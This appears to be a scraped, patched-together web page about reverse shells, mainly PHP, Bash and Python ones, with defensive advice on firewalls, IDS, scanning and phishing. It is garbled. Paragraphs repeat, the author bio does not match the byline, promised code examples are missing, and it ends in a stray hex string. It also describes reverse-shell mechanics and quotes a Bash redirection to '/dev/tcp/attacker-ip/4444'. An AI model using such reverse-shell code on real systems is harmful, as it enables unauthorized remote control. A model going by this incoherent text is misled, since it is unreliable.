Php Reverse Shell
Katja Gains
Reverse shells allow attackers to open ports to the target machines, forcing communication and enabling a complete takeover of the target machine. Therefore it is a severe security threat. This method is also commonly used in penetration tests.
For hosts protected by a network address translation (NAT), a reverse shell may be necessary for performing maintenance remotely. Although there are legitimate uses for reverse shells, cybercriminals also use them to penetrate protected hosts and perform operating system commands. Reverse shells allow attackers to bypass network security mechanisms like firewalls.
An attacker may exploit command injection vulnerabilities on a server to compromise the system. In the injected code, a reverse shell script provides a command shell enabling additional malicious actions.
The following command takes the file descriptor generated by the previous socket command, and duplicates it three times, overwriting the data streams stdin, stdout, and stderr with the reverse shell socket we created. s.fileno() refers to the file descriptor of the socket.
The final stage of the attack is to run the Python subprocess module. This allows the reverse shell to run a program as a subprocess of the socket. The subprocess. call command lets us pass any executable program. By passing /bin/sh, we run a Bash shell as a sub-process of the socket we created.
Reverse shell connections are often malicious unless you set them up for the explicit purpose of remote administration. From a server perspective, it is difficult to block all reverse shell connections when using a networked system such as a server. The following steps can help you harden your system and mitigate the risk:
There is only so much you can do to harden a server. An additional approach to preventing reverse shell is to block malicious network communication. Web Application Firewalls (WAF) and Runtime Application Self-Protection (RASP) solutions can detect communication patterns that look like a reverse shell connection and block them.
To gain control over a compromised system, an attacker usually aims to gain interactive shell access for arbitrary command execution. With such access, they can try to elevate their privileges to obtain full control of the operating system. However, most systems are behind firewalls and direct remote shell connections are impossible. One of the methods used to circumvent this limitation is a reverse shell.
The primary reason why reverse shells are often used by attackers is the way that most firewalls are configured. Attacked servers usually allow connections only on specific ports. For example, a dedicated web server will only accept connections on ports 80 and 443. This means that there is no possibility to establish a shell listener on the attacked server.
On the other hand, firewalls usually do not limit outgoing connections at all. Therefore, an attacker may establish a server on their own machine and create a reverse connection. All that the attacker needs is a machine that has a public (routable) IP address and a tool such as netcat to create the listener and bind shell access to it.
It is very simple to create reverse shells using different tools and languages. First, you need a listener on your local machine with a public IP. For example, on a Linux machine, all you need is the following netcat command:
Reverse shells on their own are always a result of some other kind of attack, for example, an SQL Injection attack. Therefore, the best way to avoid reverse shells is to protect against attacks that allow impostors to gain shell access in the first place.
A shell is a user interface for access to operating system services. A reverse shell is a remote shell, where the connection is made from the system that offers the services to the client that wants to use these services.
To create a reverse shell, you need to open a client machine port that is accessible from the Internet. Then, you need to run a listener on the client machine. Finally, you need to run a command on the server that establishes a connection with the client listener.
There is no way to completely block reverse shells. You can only make it more difficult to create one by blocking most outgoing ports (if possible) and turning off most services (if possible). You can also monitor all traffic outgoing from the server for potential shell commands.
To create a reverse shell, the attacker must first have the ability to run commands on your server. To prevent vulnerabilities that let attackers run commands, you should regularly scan your server using a vulnerability scanner.
Reverse shells are often the only way to perform remote maintenance on hosts behind a NAT, so they have legitimate administrative uses. However, they can also be used by cybercriminals to execute operating system commands on hosts protected from incoming connections by a firewall or other network security systems. For example, a piece of malware installed on a local workstation via a phishing email or a malicious website might initiate an outgoing connection to a command server and provide hackers with a reverse shell capability. Firewalls mostly filter incoming traffic, so an outgoing connection to a listening server will often succeed.
When attempting to compromise a server, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell for further malicious activities.
To start with, the attacker needs to start a listener process on their system to listen for reverse shell connections incoming to their IP address, for example 10.0.0.123. On Linux, this can be as simple as one netcat command:
Cybersecurity writer and blog managing editor at Invicti Security. Drawing on years of experience with security, software development, content creation, journalism, and technical translation, he does his best to bring web application security and cybersecurity in general to a wider audience.
Reverse shells have legitimate administrative uses, as they are often the only way to perform remote maintenance on hosts behind a NAT. However, cybercriminals can use the same technique to execute operating system commands on hosts protected by firewalls and other cybersecurity systems.
For example, malware, installed on local workstations via phishing or malicious websites, can initiate an outbound connection to a command and control (C&C) server, and provide hackers with reverse shell capabilities. Firewalls primarily filter incoming traffic, so outgoing connections to the receiving server are usually successful.
A reverse shell attack is often the second stage of an attempt to exploit command injection vulnerabilities in a server. The attacker typically injects code that includes a reverse shell script. This provides a convenient command shell for further malicious activity.
Bash (short for Bourne Again SHell) is a Unix shell that is commonly used on Linux and other Unix-like operating systems. Here is a code example of a Bash reverse shell that can be used to establish a command shell on a remote machine:
This code assumes that the attacker has started a listener on their machine using the nc (netcat) utility, which is listening on a specified port (in this case, 4444). The second line of code, which is executed on the target machine, uses Bash to open a connection back to the listener and establish a command shell. The bash -i command tells Bash to run in interactive mode, which allows the attacker to enter commands at the command prompt. The >& /dev/tcp/attacker-ip/4444 and 0>&1 arguments redirect the input and output of the Bash shell to the connection with the listener, effectively establishing a reverse shell.
The attacker establishes a command shell on a remote machine by exploiting a vulnerability in the target system and using PHP, a server-side scripting language, to execute commands on the target machine:
The PHP code uses the fsockopen() function to open a connection to the listener and the exec() function to execute the /bin/sh shell and redirect its input, output, and error streams to the connection with the listener.
Static application security testing (SAST) is a method for detecting application security issues before an application is deployed. It is a software testing strategy that analyzes code for exploitable vulnerabilities before an application goes into production. Developers use SAST to identify and remediate vulnerabilities before cybercriminals can exploit them.
A key focus on security testing is user inputs. Any input should be considered potentially malicious. User inputs are the main vector used for code injection attacks, and those are the most common way to inject reverse shell scripts into a target system.
Phishing messages, in particular email messages, are a common way for attackers to penetrate remote systems and deploy a remote shell. All employees should receive cybersecurity education to avoid opening and interacting with suspicious messages. However, since phishing attacks are becoming more sophisticated, and not all users are vigilant, it is important to deploy email security systems that can identify and block malicious messages.
Closely monitor inbound and outbound traffic on sensitive systems to discover any anomalous access attempt. In the case of a reverse shell attack, identify if someone is trying to access a system from an IP address that is not on the whitelist. This is a good way to detect an attack early in the kill chain.
An intrusion detection system (IDS) can also be an important defense against reverse shell, because it can detect malicious communication, such as a reverse shell communicating with a C&C server, and block it in real time.
Attackers often exploit existing code injection vulnerabilities to execute shell scripts and escalate to root privileges. Therefore, it is critical to patch web applications and servers regularly and test them with trusted vulnerability scanners.
d3342ee215